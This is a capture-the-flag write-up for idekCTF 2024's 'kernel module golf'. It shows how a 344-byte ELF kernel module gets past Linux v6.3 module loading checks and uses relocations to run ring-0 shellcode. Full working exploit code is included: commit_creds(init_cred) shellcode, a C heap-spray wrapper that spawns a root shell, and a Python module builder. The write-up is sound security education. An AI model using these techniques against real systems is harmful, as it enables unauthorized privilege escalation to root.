Contents

idekCTF 2024

Writeup of pwn/kernel module golf from idekCTF 2024.

overview

handout: kernel-module-golf.tar.gz

We’re an unprivileged user on a v6.3.0 Linux kernel. There’s a custom device driver that allows us to insert our own loadable kernel module (LKM) with a maximum size of 345 bytes. Becoming root with just a few bytes of ring 0 shellcode is easy enough, but there are many sanity checks on LKMs (which are in ELF format) before their code is actually executed.

The challenge description links to this tmpout article which lays some foundations for LKM golfing (on v5.15), concluding with an 800 byte hello world module. It’s possible to reduce this much further, although I should note that additional checks have recently been added that make this challenge impossible on the latest version of Linux, so keep in mind that the solution and ELF processing code we will be analyzing (mostly under kernel/module/main.c) are specific to v6.3.

load_module

The load_module kernel function is responsible for loading an LKM. It performs entirely custom ELF validation, relocation, and execution, so existing techniques for execve ELF golfing are not very applicable. This is the function that the challenge’s device driver calls with our input.

    if (len > 345) {
        goto done;
    }
    if (0 != copy_from_user(&args, (void *)arg, sizeof(args))) {
        goto done;
    }
    info.len = len;
    info.hdr = kmalloc(info.len, GFP_KERNEL | __GFP_NOWARN);
    if (!info.hdr) {
        goto done;
    }
    if (0 != copy_from_user(info.hdr, (void *)args.module, info.len)) {
        goto release_hdr;
    }
    ret = load_module(&info, args.uargs, 0);

The main argument to load_module is struct load_info *info, which initially contains the length of our module in info->len and a pointer to our ELF data in info->hdr. load_module makes a series of function calls for setup, ending with a call to do_init_module. The most important functions to us are listed in the order they’re called as follows: elf_validity_check, setup_load_info, layout_and_allocate, apply_relocations, post_relocation, and complete_formation

My first thought was that despite the size limit of 345 bytes, due to the presence of our module data on the heap in kmalloc-512, we could spray some objects to reliably control 1024 bytes of data and use the same module provided in the tmpout article, hoping that info->len wasn’t used much. Let’s look at elf_validity_check first to see why this approach doesn’t work. I’ll also note that some familiarity with the ELF format and specifically section headers is expected for the following explanations. This wikipedia page should be a good introduction.

elf_validity_check

	/*
	 * Do basic sanity checks against the ELF header and
	 * sections.
	 */
	err = elf_validity_check(info);

Notable checks:

So far the only section required to exist is the initial SHT_NULL. The earliest we can overlap e_shoff (which marks the start of the section headers) with the ELF header is at 0x10 bytes to meet the 0 field requirements. 0xf could work, but this makes the sh_name field very large due to the enforced 0x3e e_machine field, causing a fault later when the module symtab processing offsets a heap pointer with this value.

The biggest factor in reducing size is minimizing the number of sections, since their headers are placed contiguously starting at e_shoff and are 0x40 bytes each. With the mandatory null section header ending at 0x50 and our size limit of 0x159 (345), we can have at maximum 4 additional sections. Luckily, we don’t need any program headers since they’re completely ignored.

setup_load_info

	/*
	 * Everything checks out, so set up the section info
	 * in the info structure.
	 */
	err = setup_load_info(info, flags);

Notable checks:

Now is a good time to introduce struct module, which represents a single loaded LKM. A pointer to the “.gnu.linkonce.this_module” section’s data is assigned to info->mod (which is of type struct module *)

	info->index.mod = find_sec(info, ".gnu.linkonce.this_module");
	if (!info->index.mod) {
		pr_warn("%s: No module found in object\n",
			info->name ?: "(missing .modinfo section or name field)");
		return -ENOEXEC;
	}
	/* This is temporary: point mod into copy of data. */
	info->mod = (void *)info->hdr + info->sechdrs[info->index.mod].sh_offset;

The module struct is much larger than our 345 byte ELF, so accesses of this temporary copy will end up reading OOB data on the heap. The copy is migrated to a newly allocated section in move_module, called at the end of layout_and_allocate. Most of the fields from the temporary copy are ignored or reinitialized, so spraying heap data to fill certain fields isn’t particularly helpful, although spraying with zeroes does improve stability.

Some of the fields important to us are shown below:

	/* Startup function. */
	int (*init)(void);

	/* Core layout: rbtree is accessed frequently, so keep together. */
	struct module_layout core_layout __module_layout_align;
	struct module_layout init_layout;
#ifdef CONFIG_ARCH_WANTS_MODULES_DATA_IN_VMALLOC
	struct module_layout data_layout;
#endif

The init function pointer will be called by do_init_module at the end of load_module, so it’s how we execute shellcode. We’ll need relocs to set it to an address relative to where our module is loaded. The struct module_layout fields define memory segments.

struct module_layout {
	/* The actual code + data. */
	void *base;
	/* Total size. */
	unsigned int size;
	/* The size of the executable code.  */
	unsigned int text_size;
	/* Size of RO section of the module (text+rodata) */
	unsigned int ro_size;
	/* Size of RO after init section */
	unsigned int ro_after_init_size;

#ifdef CONFIG_MODULES_TREE_LOOKUP
	struct mod_tree_node mtn;
#endif
};

These layouts will be important for preventing crashes and ensuring that our shellcode is mapped as executable.

Back to ELF golfing, we learned that we need an additional section for the symbol table and one section with the this_module name. We also need a strtab section to make the name lookup work. We can accomplish all of this with only one additional section. We make its type SHT_SYMTAB, make sh_offset point to the this_module string, and set its sh_name such that it becomes this_module. We then point sh_link and e_shstrndx to its index, causing it to be used as the strtab.

We don’t need any symbols for our relocs, so making our symtab point to strtab data works fine. We’ve now added an additional section header and a 26 byte string, bringing our 0x50 byte file to 0xaa (170) bytes.

layout_and_allocate

/* Figure out module layout, and allocate all the memory. */
	mod = layout_and_allocate(info, flags);

layout_and_allocate first makes a call to check_modinfo, but we can ignore these checks because CONFIG_MODULE_FORCE_LOAD is enabled.

It later calls some important functions below:

    /*
	 * Determine total sizes, and put offsets in sh_entsize.  For now
	 * this is done generically; there doesn't appear to be any
	 * special cases for the architectures.
	 */
	layout_sections(info->mod, info);
	layout_symtab(info->mod, info);

	/* Allocate and move to the final place */
	err = move_module(info->mod, info);

layout_sections is benign and calculates section sizes for the layout structs. It does rewrite sh_entsize, so using that field to overlap data for relocations or shellcode isn’t possible. layout_symtab will dereference the heap strtab offset with 32 bit section names, so overlapping sh_name with large values may cause faults here. move_module allocates new memory for the module to reside permanently and copies over all sections. The copying code is shown below.

	/* Transfer each section which specifies SHF_ALLOC */
	for (i = 0; i < info->hdr->e_shnum; i++) {
		void *dest;
		Elf_Shdr *shdr = &info->sechdrs[i];

		if (!(shdr->sh_flags & SHF_ALLOC))
			continue;

		if (shdr->sh_entsize & INIT_OFFSET_MASK)
			dest = mod->init_layout.base
				+ (shdr->sh_entsize & ~INIT_OFFSET_MASK);
		else if (!(shdr->sh_flags & SHF_EXECINSTR))
			dest = mod->data_layout.base + shdr->sh_entsize;
		else
			dest = mod->core_layout.base + shdr->sh_entsize;

		if (shdr->sh_type != SHT_NOBITS)
			memcpy(dest, (void *)shdr->sh_addr, shdr->sh_size);
		/* Update sh_addr to point to copy in image. */
		shdr->sh_addr = (unsigned long)dest;
	}

Note that mod is set to the return value of layout_and_allocate to be used for the remainder of load_module.

    /* Module has been copied to its final place now: return it. */
	mod = (void *)info->sechdrs[info->index.mod].sh_addr;
	kmemleak_load_module(mod, info);
	return mod;

The sh_addr being returned was relocated by move_module. This usually isn’t an issue because the previously initialized module fields should be copied to the new location. The copying is performed per section by the memcpy call below.

memcpy(dest, (void *)shdr->sh_addr, shdr->sh_size);

sh_size for our module section is constrained to be much smaller than the full structure size, as sections are checked to be in bounds of info->len (345). Because it’s being used here as the length to copy, the majority of the new module structure fields will remain zeroed.

By breaking on the memcpy and examining the structure, we notice two pointers at offsets 0x140 and 0x190. The lack of these pointers being copied will cause faults later, but the next important function, apply_relocations, provides a solution.

apply_relocations

Relocations make this challenge possible in multiple ways. We can write relative pointers at relative offsets from where our module is loaded to fix corrupted structures and set init to our shellcode. apply_relocations looks for an SHT_RELA section and calls apply_relocate_add with its data. This will end up calling __write_relocate_add, where a subset of the usual x86_64 relocation types are implemented. These relocations have the limitation of only being able to write to memory locations that are already zeroed.

		if (apply) {
			if (memcmp(loc, &zero, size)) {
				pr_err("x86/modules: Invalid relocation target, existing value is nonzero for type %d, loc %p, val %Lx\n",
				       (int)ELF64_R_TYPE(rel[i].r_info), loc, val);
				return -ENOEXEC;
			}
			write(loc, &val, size);
		}

The calculation for loc and val is shown below.

		/* This is where to make the change */
		loc = (void *)sechdrs[sechdrs[relsec].sh_info].sh_addr
			+ rel[i].r_offset;

		/* This is the symbol it is referring to.  Note that all
		   undefined symbols have been resolved.  */
		sym = (Elf64_Sym *)sechdrs[symindex].sh_addr
			+ ELF64_R_SYM(rel[i].r_info);

		DEBUGP("type %d st_value %Lx r_addend %Lx loc %Lx\n",
		       (int)ELF64_R_TYPE(rel[i].r_info),
		       sym->st_value, rel[i].r_addend, (u64)loc);

		val = sym->st_value + rel[i].r_addend;

The ELF64_R_SYM(...) will return 0, making val the sh_addr of the symtab plus our addend, allowing us to write any relative pointer. The relocation types we’ll be using are

		case R_X86_64_64:
			size = 8;
			break;

and

		case R_X86_64_PLT32:
			val -= (u64)loc;
			size = 4;
			break;

Using the PLT32/PC64 relocations we can write absolute values since the relative addresses are subtracted from each other, which will be helpful for setting a size later. Otherwise, we just want the normal 8 byte relocation for writing pointers.

Adding an SHT_RELA section incurs 0x40 bytes for the header, and relocations are set up contiguously at 0x18 bytes each. This puts us at 234 bytes with no relocations, and a maximum of 4 relocations costing 0x60 bytes to reach 330 bytes.

Assuming we use all 4 relocations, we’ll have 15 bytes left for shellcode. The shellcode will need to be part of our section by sh_size so it’s copied into the module mappings, but as long as its size is less than the rela size of 0x18, it will be ignored, since the number of relocations to apply is calculated as sh_size / sizeof(rela)

post_relocation

This function makes a call to add_kallsyms which will crash using the minimal module we’ve described up to this point. Some of the problematic code is shown below.

	rcu_dereference(mod->kallsyms)->typetab = mod->init_layout.base + info->init_typeoffs;

	/*
	 * Now populate the cut down core kallsyms for after init
	 * and set types up while we still have access to sections.
	 */
	mod->core_kallsyms.symtab = dst = mod->data_layout.base + info->symoffs;

mod->data_layout.base and mod->init_layout.base are null due to the copy failure earlier (these are the two pointers I mentioned). Because they were previously module relative pointers, we can rewrite their original values using two relocs to prevent the crash. The exact offsets and addends depend on the order, number, and size of the sections, but they can be easily determined in a debugger.

complete_formation

This function notably makes the following calls.

	module_enable_ro(mod, false);
	module_enable_nx(mod);
	module_enable_x(mod);

We need module_enable_x to mark our rela section as executable. This function’s code is shown below.

void module_enable_x(const struct module *mod)
{
	if (!PAGE_ALIGNED(mod->core_layout.base) ||
	    !PAGE_ALIGNED(mod->init_layout.base))
		return;

	frob_text(&mod->core_layout, set_memory_x);
	frob_text(&mod->init_layout, set_memory_x);
}

The alignment check isn’t an issue so long as we restored the original base pointers. frob_text is shown below.

static void frob_text(const struct module_layout *layout,
		      int (*set_memory)(unsigned long start, int num_pages))
{
	set_memory((unsigned long)layout->base,
		   PAGE_ALIGN(layout->text_size) >> PAGE_SHIFT);
}

text_size, which determines the number of pages to make executable, will be zero for both init_layout and core_layout due to the copy failure. The field is only 32 bits, so we’ll use the PLT32 rela to write a constant value to it. This also allows us to fit shellcode in the upper 6 bytes of our addend, bringing our shellcode total to 21 bytes.

do_init_module

This function marks the end of load_module and will call the function pointer in mod->init if it’s not null.

	/* Start the module */
	if (mod->init != NULL)
		ret = do_one_initcall(mod->init);

By relocating mod->init at offset 0x138 of our module struct with a pointer to our shellcode in the executable rela section, we achieve code execution. So long as our shellcode returns properly, the rest of do_init_module will run fine and we’ll return to userspace afterwards.

shellcode

The return address when our shellcode is executed is a kernel text address, so we can pop it into a register, push it back, and add some offsets to calculate other kernel addresses. My initial plan was to overwrite modprobe_path, but CONFIG_STATIC_USERMODEHELPER being enabled prevents this. Instead, I calculate the addresses of commit_creds and init_cred to call commit_creds(init_cred), making our process root when we return.

pop rbx
push rbx
add rbx, 0xb6b08
push rbx
pop rdi
add rdi, 0x199aea0
jmp rbx

This assembles to 20 bytes, although I will note that a shorter payload can be made by disabling SMAP+SMEP and jumping to userspace code. With this addition, our LKM comes to a total of 344 bytes.

solution

Once we’ve generated our LKM, we need a userspace wrapper to perform the heap spray for stability (I used msg_msg because there are no kmalloc-cg-* caches in this version) and make the device ioctl to initiate the loading. When we return from this ioctl we can spawn a root shell. The pwn.c wrapper is shown below.

#define _GNU_SOURCE
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <pthread.h>
#include <byteswap.h>
#include <poll.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/timerfd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/reboot.h>
#include <arpa/inet.h>
#include <sys/shm.h>
#include <sys/ioctl.h>

typedef struct  {
	long mtype;
	char mtext[1];
} msg;

int devfd;

int normal = 0;

void load(int len, char *mod, char *uarg)
{
	struct {
		char *module;
		char *uargs;
	} args;
	args.module = mod;
	args.uargs = uarg;
	ioctl(devfd, len, &args);
}

void spray(char *golf, int golf_len)
{
	char buf1[0x200], buf2[0x200];
	msg *m1 = (msg*)buf1, *m2 = (msg*)buf2;

	m1->mtype = 1;
	m2->mtype = 1;
	memcpy(m1->mtext, golf+0x30, 0x200-0x30);
	memcpy(m2->mtext, golf+0x230, 0x200-0x30);

	int qid1 = msgget(IPC_PRIVATE, 0666|IPC_CREAT);
	int qid2 = msgget(IPC_PRIVATE, 0666|IPC_CREAT);
	for (int i = 0; i < 6; i++)
		msgsnd(qid2, m2, 0x200-0x30, 0);
	msgsnd(qid1, m1, 0x200-0x30, 0);
	msgrcv(qid1, buf1, 0x200, 0, IPC_NOWAIT|MSG_NOERROR);
}

int pwn()
{
	#include "golf.c"
	spray((char*)golf, golf_len);
	load(345, (char*)golf, "ok");
	return system("id; /bin/sh");
}

int main(int argc, char **argv)
{
	devfd = open("/dev/load", O_RDWR);
	return pwn();
}

And the solve.py script to generate the LKM is shown below.

#!/usr/bin/env python3

from pwn import *
import os

context.arch = "amd64"

class Ehdr():
    def __init__(self):
        self.ei_class = 2
        self.ei_data = 1
        self.ei_version = 0
        self.ei_osabi = 0
        self.ei_abiversion = 0
        self.ei_pad = b"\x00"*7
        self.e_type = 1
        self.e_machine = 0x3e
        self.e_version = 0
        self.e_entry = 0
        self.e_phoff = 0
        self.e_shoff = 0
        self.e_flags = 0
        self.e_ehsize = 0
        self.e_phentsize = 0
        self.e_phnum = 0
        self.e_shentsize = 0x40
        self.e_shnum = 0
        self.e_shstrndx = 0
    def __len__(self): return 0x40
    def create(self):
        e = b"\x7fELF"
        e += p8(self.ei_class)
        e += p8(self.ei_data)
        e += p8(self.ei_version)
        e += p8(self.ei_osabi)
        e += p8(self.ei_abiversion)
        e += self.ei_pad
        e += p16(self.e_type)
        e += p16(self.e_machine)
        e += p32(self.e_version)
        e += p64(self.e_entry)
        e += p64(self.e_phoff)
        e += p64(self.e_shoff)
        e += p32(self.e_flags)
        e += p16(self.e_ehsize)
        e += p16(self.e_phentsize)
        e += p16(self.e_phnum)
        e += p16(self.e_shentsize)
        e += p16(self.e_shnum)
        e += p16(self.e_shstrndx)
        assert len(e) == 0x40
        return e

class Shdr():
    def __init__(self, sh_type):
        self.sh_name = 0
        self.sh_type = sh_type
        self.sh_flags = 0
        self.sh_addr = 0
        self.sh_offset = 0
        self.sh_size = 0
        self.sh_link = 0
        self.sh_info = 0
        self.sh_addralign = 1
        self.sh_entsize = 0
    def __len__(self): return 0x40
    def create(self):
        e = p32(self.sh_name)
        e += p32(self.sh_type)
        e += p64(self.sh_flags)
        e += p64(self.sh_addr)
        e += p64(self.sh_offset)
        e += p64(self.sh_size)
        e += p32(self.sh_link)
        e += p32(self.sh_info)
        e += p64(self.sh_addralign)
        e += p64(self.sh_entsize)
        assert len(e) == 0x40
        return e

def mkrela(offset, info, addend=0):
    return p64(offset) + p64(info) + p64(addend)

out = b""
# calculates kernel addresses from return address
# to call commit_cred(init_cred)
code = asm("""
    pop rbx
    push rbx
    add rbx, 0xb6b08
    push rbx
    pop rdi
    add rdi, 0x199aea0
    jmp rbx
""")

ehdr = Ehdr()
ehdr.e_shoff = 0x10
ehdr.e_shstrndx = 1
ehdr.e_shnum = 3

strtab = b".gnu.linkonce.this_module\x00"
symtab = Shdr(2)
symtab.sh_size = len(strtab)+4
symtab.sh_flags = 0x42
symtab.sh_name = 4
symtab.sh_link = 1

# relocate init to our shellcode
rela0 = mkrela(0x3138, 1, 0x2df8+0x78)
# set init_layout.base to not segfault
rela1 = mkrela(0x3190, 1, 0x2df8)
# set data_layout.base to not segfault
rela2 = mkrela(0x3140, 1, 0x4df8)
# set init_layout.text_size so our segment is marked exectuable,
# also fit some shellcode in here since it's a 4 byte reloc with an 8 byte addend
rela3 = mkrela(0x319c, 4, 0x7fb2|(u64(code[:6].ljust(8, b"\x00"))<<0x10))

relas = Shdr(4)
relas.sh_size = len(rela0)*4 + len(code)-6
relas.sh_flags = 2
relas.sh_info = 2

out += ehdr.create() + b"\x00"*0x10
data = b""
total = len(out) + len(symtab)*2

symtab.sh_offset = total-4
data += strtab
total += len(strtab)

relas.sh_offset = total
data += rela0 + rela1 + rela2 + rela3
data += code[6:]

out += symtab.create() + relas.create() + data
print(len(out))
# null heap spray for stability
out = out.ljust(0x400, b"\x00")

f = open("golf", "wb")
f.write(out)
f.close()

os.system("xxd -i golf >golf.c")

Huge props to the author unvariant for such an amazing challenge.